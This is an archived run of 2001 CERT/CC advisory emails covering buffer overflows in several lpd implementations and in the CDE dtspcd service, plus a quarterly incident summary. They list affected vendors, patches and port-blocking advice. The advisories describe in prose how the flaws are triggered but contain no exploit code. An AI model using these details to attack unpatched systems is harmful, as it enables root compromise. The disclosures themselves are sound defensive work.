Center thanks Defcom Security, who discovered this vulnerability and published the information in their advisory. Additionally, we thank Oracle, who published an advisory on this issue. _________________________________________________________________ Author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-29.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History October 25, 2001: initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBO9jGraCVPMXQI2HJAQFVnQP/V53ZIsohPcXiF6pcvUl5zjpRccWtJRkl StUdAbz9aiT7TcuhPcAtOkpOaWMPiDOFGR8Fu8MpVehS8VFEGzDJ0quKgf6LRRjx 8Ni5klqhORJ/+3Z/Pf0c+yHhMlDRV3SFPpnMLaPifBwXDmzgqJRTsL3dRb7fsigR aljIl/lGOHY= =yqti -----END PGP SIGNATURE----- From - Mon Nov 5 16:11:34 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fA5MgJg32277; Mon, 5 Nov 2001 14:42:19 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA15382; Mon, 5 Nov 2001 14:34:23 -0500 (EST) Date: Mon, 5 Nov 2001 14:34:23 -0500 (EST) Received: by canaveral.red.cert.org; Mon, 5 Nov 2001 14:29:06 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-30 Multiple Vulnerabilities in lpd X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: e8a6578e38cab29ec61df4c649be694e Status: RO X-Status: X-Keywords: X-UID: 26 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-30 Multiple Vulnerabilities in lpd Original release date: November 05, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * BSDi BSD/OS Version 4.1 and earlier * Debian GNU/Linux 2.1 and 2.1r4 * FreeBSD All released versions FreeBSD 4.x, 3.x, FreeBSD 4.3-STABLE, 3.5.1-STABLE prior to the correction date * Hewlett-Packard HP9000 Series 700/800 running HP-UX releases 10.01, 10.10, 10.20, 11.00, and 11.11 * IBM AIX Versions 4.3 and AIX 5.1 * Mandrake Linux Versions 6.0, 6.1, 7.0, 7.1 * NetBSD 1.5.2 and earlier * OpenBSD Version 2.9 and earlier * Red Hat Linux 6.0 all architectures * SCO OpenServer Version 5.0.6a and earlier * SGI IRIX 6.5-6.5.13 * Sun Solaris 8 and earlier * SuSE Linux Versions 6.1, 6.2, 6.3, 6.4, 7.0, 7.1, 7.2 Overview There are multiple vulnerabilities in several implementations of the line printer daemon (lpd). The line printer daemon enables various clients to share printers over a network. Review your configuration to be sure you have applied all relevant patches. We also encourage you to restrict access to the lpd service to only authorized users. I. Description There are multiple vulnerabilities in several implementations of the line printer daemon (lpd), affecting several systems. Some of these problems have been publicly disclosed previously. However, we believe many system and network administrators may have overlooked one or more of these vulnerabilities. We are issuing this document primarily to encourage system and network administators to check their systems for exposure to each of these vulnerabilities, even if they have addressed some lpd vulnerabilities recently. Most of these vulnerabilities are buffer overflows allowing a remote intruder to gain root access to the lpd server. For the latest and most detailed information about the known vulnerabilities, please see the vulnerability notes linked to below. VU#274043 - BSD line printer daemon buffer overflow in displayq() There is a buffer overflow in several implementations of in.lpd, a BSD line printer daemon. An intruder can send a specially crafted print job to the target and then request a display of the print queue to trigger the buffer overflow. The intruder may be able use this overflow to execute arbitrary commands on the system with superuser privileges. The line printer daemon must be enabled and configured properly in order for an intruder to exploit this vulnerability. This is, however, trivial as the line printer daemon is commonly enabled to provide printing functionality. In order to exploit the buffer overflow, the intruder must launch his attack from a system that is listed in the "/etc/hosts.equiv" or "/etc/hosts.lpd" file of the target system. VU#388183 - IBM AIX line printer daemon buffer overflow in kill_print() A buffer overflow exists in the kill_print() function of the line printer daemon (lpd) on AIX systems. An intruder could exploit this vulnerability to obtain root privileges or cause a denial of service (DoS). The intruder would need to be listed in the victim's /etc/hosts.lpd or /etc/hosts.equiv file, however, to exploit this vulnerability. VU#722143 - IBM AIX line printer daemon buffer overflow in send_status() A buffer overflow exists in the send_status() function of the line printer daemon (lpd) on AIX systems. An intruder could exploit this vulnerability to obtain root privileges or cause a denial of service (DoS). The intruder would need to be listed in the victim's /etc/hosts.lpd or /etc/hosts.equiv file, however, to exploit this vulnerability. VU#466239 - IBM AIX line printer daemon buffer overflow in chk_fhost() A buffer overflow exists in the chk_fhost() function of the line printer daemon (lpd) on AIX systems. An intruder could exploit this vulnerability to obtain root privileges or cause a denial of service (DoS). The intruder would need control of the DNS server to exploit this vulnerability. VU#39001 - line printer daemon allows options to be passed to sendmail There exists a vulnerability in the line printer daemon that permits an intruder to send options to sendmail. These options could be used to specify another configuration file allowing an intruder to gain root access. VU#30308 - line printer daemon hostname authentication bypassed with spoofed DNS A vulnerability exists in the line printer daemon (lpd) shipped with the printer package for several systems. The authentication method was not thorough enough. If a remote user was able to control their own DNS so that their IP address resolved to the hostname of the print server, access would be granted when it should not be. VU#966075 - Hewlett-Packard HP-UX line printer daemon buffer overflow A buffer overflow exists in HP-UX's line printer daemon (rlpdaemon) that may allow an intruder to execute arbitrary code with superuser privilege on the target system. The rlpdaemon is installed by default and is active even if it is not being used. An intruder does not need any prior knowledge, or privileges on the target system, in order to exploit this vulnerability. II. Impact All of these vulnerabilities can be exploited remotely. In most cases, they allow an intruder to execute arbitrary code with the privileges of the lpd server. In some cases, an intruder must have access to a machine listed in /etc/hosts.equiv or /etc/hosts.lpd, and in some cases, an intruder must be able to control a nameserver. One vulnerability (VU#39001) allows you to specify options to sendmail that can be used to execute arbitrary commands. Ordinarily, this vulnerability is only exploitable from machines that are authorized to use the lpd server. However, in conjunction with another vulnerability (VU#30308), permitting intruders to gain access to the lpd service, this vulnerability can be used by intruders not normally authorized to use the lpd service. For specific information about the impacts of each of these vulnerabilities, please consult the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls). III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. This table represents the status of each vendor with regard to each vulnerability. Please be aware that vendors produce multiple products; if they are listed in this table, not all products may be affected. If a vendor is not listed in the table below, then their status should be considered unknown. For specific information about the status of each of these vulnerabilities, please consult the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls). + = Affected - - = Not Affected ? = Unknown VU# -> |274043 |388183 |722143 |466239 |39001 |30308 |966075 Vendors |||||||||||||||||||||||||||||||||||||||||||||||||||||||| Apple | - | ? | ? | ? | ? | ? | - BSDI | + | ? | ? | ? | ? | ? | ? Caldera | - | - | - | - | - | - | - Cray | ? | - | - | - | - | ? | - Debian | ? | ? | ? | ? | + | + | ? Engarde | - | - | - | - | - | - | - FreeBSD | + | - | - | - | - | - | - Fujitsu | - | - | - | - | - | - | - HP | ? | ? | ? | ? | ? | ? | + IBM | - | + | + | + | - | + | - Mandrake| ? | ? | ? | ? | + | ? | ? NetBSD | + | ? | ? | ? | ? | ? | ? OpenBSD | + | ? | ? | ? | ? | ? | ? Red Hat | ? | ? | ? | ? | + | + | ? SCO | + | ? | ? | ? | ? | ? | ? SGI | + | ? | ? | ? | ? | ? | ? SuSE | + | ? | ? | ? | ? | ? | ? Sun | - | - | - | - | + | - | - Restrict access to the lpd service As a general practice, we recommend disabling all services that are not explicitly required. You may wish to disable the line printer daemon if there is not a patch available from your vendor. If you cannot disable the service, you can limit your exposure to these vulnerabilities by using a router or firewall to restrict access to port 515/TCP (printer). Note that this does not protect you against attackers from within your network. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Computer, Inc. Mac OS X does not have the line printer daemon vulnerability issues described in these advisories. Berkeley Software Design, Inc. (BSDI) Some (older) versions are affected. The current (BSD/OS 4.2) release is not vulnerable. Systems are only vulnerable to attack from hosts which are allowed via the /etc/hosts.lpd file (which is empty as shipped). BSD/OS 4.1 is the only vulnerable version which is still officially supported by Wind River Systems. A patch (M410-044) is available in the normal locations, ftp://ftp.bsdi.com/bsdi/patches or via our web site at http://www.bsdi.com/support Compaq Compaq has not been able to reproduce the problems identified in this advisory for TRU64 UNIX. We will continue testing and address the LPD issues if a problem is discovered and provide patches as necessary. Cray Cray, Inc. has been unable to prove an lpd vulnerability. However, it was deemed that a buffer overflow may be possible and so did tighten up the code. See Cray SPR 721101 for more details. Debian http://www.debian.org/security/2000/20000109 FreeBSD, Inc. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01%3A58.lpd.asc Hewlett-Packard Company Hewlett-Packard has released HPSBUX0108-163 Sec. Vulnerability in rlpdaemon Bulletin and patches available from http://itrc.hp.com Details to access http://itrc.hp.com are include at the last half of any HP Bulletin. IBM Corporation http://www-1.ibm.com/services/continuity/recover1.nsf/4699c03b46f2d4f68525678c006d45ae/85256a3400529a8685256ac7005cf00a/$FILE/oar391.txt Mandrake Software http://www.linux-mandrake.com/en/updates/2000/MDKSA-2000-054.php3 NetBSD If lpd has been enabled, this issue affects NetBSD versions 1.5.2 and prior releases, and NetBSD-current prior to August 30, 2001. lpd is disabled by default in NetBSD installations. Detailed information will be released subsequent to the publication of this CERT advisory. An up-to-date PGP signed copy of the release will be maintained at ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-018.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG and http://www.NetBSD.ORG/Security/. OpenBSD http://www.openbsd.org/errata29.html#lpd RedHat Inc. http://www.redhat.com/support/errata/RHSA2000002-01.6.0.html Santa Cruz Operation, Inc. (SCO) ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.20/ SGI ftp://patches.sgi.com/support/free/security/advisories/20011003-01-P SuSE http://lists2.suse.com/archive/suse-security-announce/2001-Oct/0000.html _________________________________________________________________ The CERT Coordination Center thanks Internet Security Systems and IBM for the information provided in their advisories. _________________________________________________________________ Feedback on this document can be directed to the author, Jason A. Rafail _________________________________________________________________ References * http://www.kb.cert.org/vuls/id/274043 * http://www.kb.cert.org/vuls/id/388183 * http://www.kb.cert.org/vuls/id/722143 * http://www.kb.cert.org/vuls/id/466239 * http://www.kb.cert.org/vuls/id/39001 * http://www.kb.cert.org/vuls/id/30308 * http://www.kb.cert.org/vuls/id/966075 * http://www.kb.cert.org/vuls ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-30.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History November 05, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBO+boKKCVPMXQI2HJAQFLWgP/R8K+kw9GrKp0rF5hdrsiowPOBaO716OM M4dRX+5Ek+svlY9/P948FfU4CyKG1c4M9FzSMgoKTUmvsnB+NVFgln/d0+jMfAy0 IyzHxyp5bSbF6pbfEyyr7gy8S3xaaVyDbAmhuLAW0Kiwy1xMmOFjZLu0W+A99rf7 XMm+KQhJe6o= =pB53 -----END PGP SIGNATURE----- From - Mon Nov 12 16:48:33 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fAD0aYA14591; Mon, 12 Nov 2001 16:36:34 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA16343; Mon, 12 Nov 2001 16:59:00 -0500 (EST) Date: Mon, 12 Nov 2001 16:59:00 -0500 (EST) Received: by canaveral.red.cert.org; Mon, 12 Nov 2001 16:53:42 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess Control Service X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: e35d39284d9bb2e3817d12ddcf279103 Status: RO X-Status: X-Keywords: X-UID: 27 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess Control Service Original release date: November 12, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running CDE Overview There is a remotely exploitable buffer overflow vulnerability in a library function used by the CDE Subprocess Control Service. This vulnerability could be used to crash the service or to execute arbitrary code with root privileges. This vulnerability is documented in VU#172583. I. Description The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on UNIX and Linux operating systems. The CDE Subprocess Control Service (dtspcd) is a network daemon that accepts requests from clients to execute commands and launch applications remotely. On systems running CDE, dtspcd is spawned by the Internet services daemon (typically inetd or xinetd) in response to a CDE client request. dtspcd is typically configured to run on port 6112/tcp with root privileges. For more information about CDE, see http://www.opengroup.org/cde/ http://www.opengroup.org/desktop/faq/ There is a remotely exploitable buffer overflow vulnerability in a shared library that is used by dtspcd. During client negotiation, dtspcd accepts a length value and subsequent data from the client without performing adequate input validation. As a result, a malicious client can manipulate data sent to dtspcd and cause a buffer overflow, potentially executing code with root privileges. The vulnerability was first reported to us in March 1999, and more recently by Internet Security Systems (ISS) X-Force. For more information, see http://www.kb.cert.org/vuls/id/172583 http://xforce.iss.net/alerts/advise101.php This vulnerability has been assigned the identifier CAN-2001-0803 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803 Many common UNIX systems ship with CDE installed and enabled by default. To determine if your system is configured to run dtspcd, check for the following entries (may be wrapped): /etc/services dtspc 6112/tcp /etc/inetd.conf dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd Any system that does not run the CDE Subprocess Control Service is not vulnerable to this problem. II. Impact An attacker can execute arbitrary code with root privileges. III. Solution Apply a patch Appendix A contains information from vendors who have provided information for this advisory. We will update the appendix as we receive more information. If a vendor's name does not appear, then the CERT/CC did not hear from that vendor. Please contact your vendor directly. Limit access to vulnerable service Until patches are available and can be applied, you may wish to limit or block access to the Subprocess Control Service from untrusted networks such as the Internet. Using a firewall or other packet-filtering technology, block or restrict access to the port used by the Subprocess Control Service. As noted above, dtspcd is typically configured to listen on port 6112/tcp. It may be possible to use TCP Wrapper or a similar technology to provide improved access control and logging functionality for dtspcd connections. Keep in mind that blocking ports at a network perimeter does not protect the vulnerable service from the internal network. It is important to understand your network configuration and service requirements before deciding what changes are appropriate. TCP Wrapper is available from ftp://ftp.porcupine.org/pub/security/index.html Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Caldera, Inc. Caldera Open Unix and UnixWare are vulnerable. Caldera has released Security Advisory CSSA-2001-SCO.30 (URL wrapped): ftp://stage.caldera.com/pub/security/openunix/ CSSA-2001-SCO.30/CSSA-2001-SCO.30.txt Compaq Computer Corporation Case ID SSRT0782U Compaq has not been able to reproduce the problem identified in this advisory for any Compaq OS. However, with the information available, we are including a code change for Compaq's TRU64 UNIX that will further reduce any potential overflow vulnerability. This updated code will be announced when patches are available from the TRU64 UNIX FTP site and will be included in future releases of TRU64 UNIX. The TRU64 UNIX FTP patch site is at: http://ftp.support.compaq.com/public/dunix/ To subscribe to automatically receive future NEW Security Advisories from the Compaq's Software Security Response Team via electronic mail, use your browser select the URL: http://www.support.compaq.com/patches/mailing-list.shtml Select "Security and Individual Notices" for immediate dispatch notifications directly to your mailbox. To report new Security Vulnerabilities, send mail to: security-ssrt@compaq.com Cray Inc. UNICOS, UNICOS/mk, and CrayTools are not vulnerable. Fujitsu Fujitsu's UXP/V operating system is not vulnerable because it does not support any CDE components. Hewlett-Packard Company The version of dtspcd supplied by HP has a buffer overflow. It is not clear whether this overflow can be exploited. To be safe HP is generating patches to fix this overflow on the assumption that it might be exploitable. IBM Corporation IBM addressed a buffer overflow in CDE dtspcd in AIX 4.x around April 1999. See the following APARs for more information (URLs wrapped): APAR IY06694: http://techsupport.services.ibm.com/aix/fixes/v4/X11/ X11.Dt.rte.4.3.3.10.info APAR IX89419 (AIX 4.3.0): http://www-1.ibm.com/servlet/support/manager?rs=0&rt=0& org=apars&doc=29B5A5858069D8A2852567C90039978E http://techsupport.services.ibm.com/aix/fixes/v4/X11/ X11.Dt.lib.4.3.2.5.info APAR IX89893 (AIX 4.2.0): http://www-1.ibm.com/servlet/support/manager?rs=0&rt=0& org=apars&doc=AAF008DAA07200B6852567CC0049B07D APAR IX89806 (AIX V4.1 BOS): http://www-1.ibm.com/servlet/support/manager?rs=0&rt=0& org=apars&doc=446F48D60A887FF0852567CA005C9920 The Open Group The Open Group maintains source code for the Common Desktop Environment (CDE). The Open Group is investigating this issue, and source licensees of The Open Group's CDE product can contact desktop@opengroup.org for advice regarding this issue. SGI SGI acknowledges the CDE vulnerabilities reported by CERT and is currently investigating. No further information is available at this time. For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list. http://www.sgi.com/support/security/ Sun The Sun dtspcd daemon is vulnerable to this buffer overflow. Sun is generating patches to address this issue for all affected and supported versions of Solaris. Sun will be releasing a Sun Security Bulletin once the patches are officially released and publicly available. The patches will be available from: http://sunsolve.sun.com/securitypatch Sun Security Bulletins are available from: http://sunsolve.sun.com/security Xi Graphics We have not been able to confirm whether we are vulnerable to this exploit, however the potential for a buffer overrun is present. We will provide a patch on our FTP site for DeXtop during the week of [November] 12th that addresses this issue. Appendix B. - References 1. http://www.kb.cert.org/vuls/id/172583 2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803 3. http://xforce.iss.net/alerts/advise101.php 4. http://www.opengroup.org/cde/ 5. http://www.opengroup.org/desktop/faq/ _________________________________________________________________ _________________________________________________________________ The CERT Coordination Center thanks Internet Security Systems (ISS) X-Force, who published an advisory on this issue. _________________________________________________________________ Author: Art Manion ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-31.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History November 12, 2001: initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBO/BEB6CVPMXQI2HJAQG9PwP/aF15EaiyfA/YOUYmWCtAxhygunt2CqQ5 cUiUrJYOdVGdalHsUlNTUkQ+QxQec2xAIep5Z3Np4p3pMFHXMXgW1EOEn5KtFwip RlG2amdCMTcC8BUSM9h+zW+z1EY6idZ2iCyYr6hh5uMsC65/5v6SWpgKb14DUeSh a8z0jOCLPBg= =vuwU -----END PGP SIGNATURE----- From - Tue Nov 20 13:54:32 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fAKLqR905286; Tue, 20 Nov 2001 13:52:27 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA20238; Tue, 20 Nov 2001 14:20:43 -0500 (EST) Date: Tue, 20 Nov 2001 14:20:43 -0500 (EST) Received: by canaveral.red.cert.org; Tue, 20 Nov 2001 14:15:23 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2001-04 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 35b3a3cfdcc49d3b512ac6ea08a2d19e Status: RO X-Status: X-Keywords: X-UID: 28 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2001-04 November 20, 2001 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in August 2001 (CS-2001-03), we have seen a new worm known as "Nimda," as well as active exploitation of a vulnerability in Microsft DNS servers. In addition, we have published a paper on denial of service trends, issued a new PGP key, and updated the UNIX Security Checklist. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. W32/Nimda Worm Over the past several months, we have received reports of malicious code known as the "W32/Nimda Worm." This worm can propogate itself via several methods, including email, network shares, or by visiting an infected web site. On September 18, the CERT/CC issued an advisory on Nimda. CERT Advisory CA-2001-26: Nimda Worm http://www.cert.org/advisories/CA-2001-26.html 2. Exploitation of Vulnerability in SSH1 CRC-32 Compensation Attack Detector The CERT/CC has received multiple reports of systems being compromised via the CRC-32 compensation attack detector vulnerability (VU#945216). On November 5, the CERT/CC released an incident note which describes system compromises via a vulnerability in the SSH1 (Secure Shell Protocol v1) CRC-32 attack detection code. Consequentially, we are also receiving reports of increased scanning activity for the SSH service (22/tcp). Incident Note IN 2001-12: Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector http://www.cert.org/incident_notes/IN-2001-12.html Vulnerability Note #945216: SSH CRC32 attack detection code contains remote integer overflow http://www.kb.cert.org/vuls/id/945216 3. DNS Cache Poisoning in Microsoft DNS Servers The CERT/CC has received reports from sites experiencing cache corruption on systems running Microsoft DNS Server. We issued an incident note which describes this corruption and its impact on systems. The default configuration of this software allows data from malicious or incorrectly configured DNS servers to be cached by a Microsoft DNS server. This corruption can result in erroneous DNS information being returned to clients which use this server. Incident Note IN-2001-11: Cache Corruption on Microsoft DNS Servers http://www.cert.org/incident_notes/IN-2001-11.html Vulnerability Note #109475: Microsoft Windows NT and 2000 Domain Name Servers allow non-authoritative RRs to be cached by default http://www.kb.cert.org/vuls/id/109475 4. Trends In Denial Of Service Attack Technology This paper describes the current and possible future states of denial of service (DoS) technology. This document is in Adobe Acrobat format, and requires Acrobat Reader. Trends In Denial Of Service Attack Technology http://www.cert.org/archive/pdf/DoS_trends.pdf ______________________________________________________________________ UNIX Security Checklist Version 2.0 The CERT Coordination Center and the Australian Computer Emergency Response Team (AusCERT) have jointly published version 2.0 of the UNIX Security Checklist which details steps to improve the security of UNIX Operating Systems. We encourage system administrators to review all sections of this document and, if appropriate, modify their systems accordingly to fix potential weaknesses. AUSCERT UNIX Security Checklist http://www.cert.org/tech_tips/AUSCERT_checklist2.0.html ______________________________________________________________________ New CERT/CC PGP Key On October 1, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC. CERT/CC PGP Public Key https://www.cert.org/pgp/cert_pgp_key.asc Sending Sensitive Information To The CERT/CC http://www.cert.org/contact_cert/encryptmail.html ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Congressional Testimony http://www.cert.org/congressional_testimony/ * Incident Notes http://www.cert.org/incident_notes/ * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Tech Tips http://www.cert.org/tech_tips/ * Training Schedule http:/www.cert.org/training/ * UNIX Security Checklist v2.0 http://www.cert.org/tech_tips/unix_security_checklist2.0.html ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2001-04.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2001 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBO/qnUKCVPMXQI2HJAQFqJwP9Fdg7Z6LrdCAGgshO9zPojFjt/yV95bk8 dzt+RfWC/4sSuFipx1Db6c3UvBUwIMqW+JaryT21haHLWRatkgWGw/89hTsBfY5J iEgPc+sRagEJ/w6gOas5N2B+4uNApXU9Fj0S0IgfaLulIfixtkfJkKUAHVjFxqAk MRViE3BdE9A= =OX1Z -----END PGP SIGNATURE----- From - Wed Nov 21 15:04:07 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fALMND728505; Wed, 21 Nov 2001 14:23:13 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA25093; Wed, 21 Nov 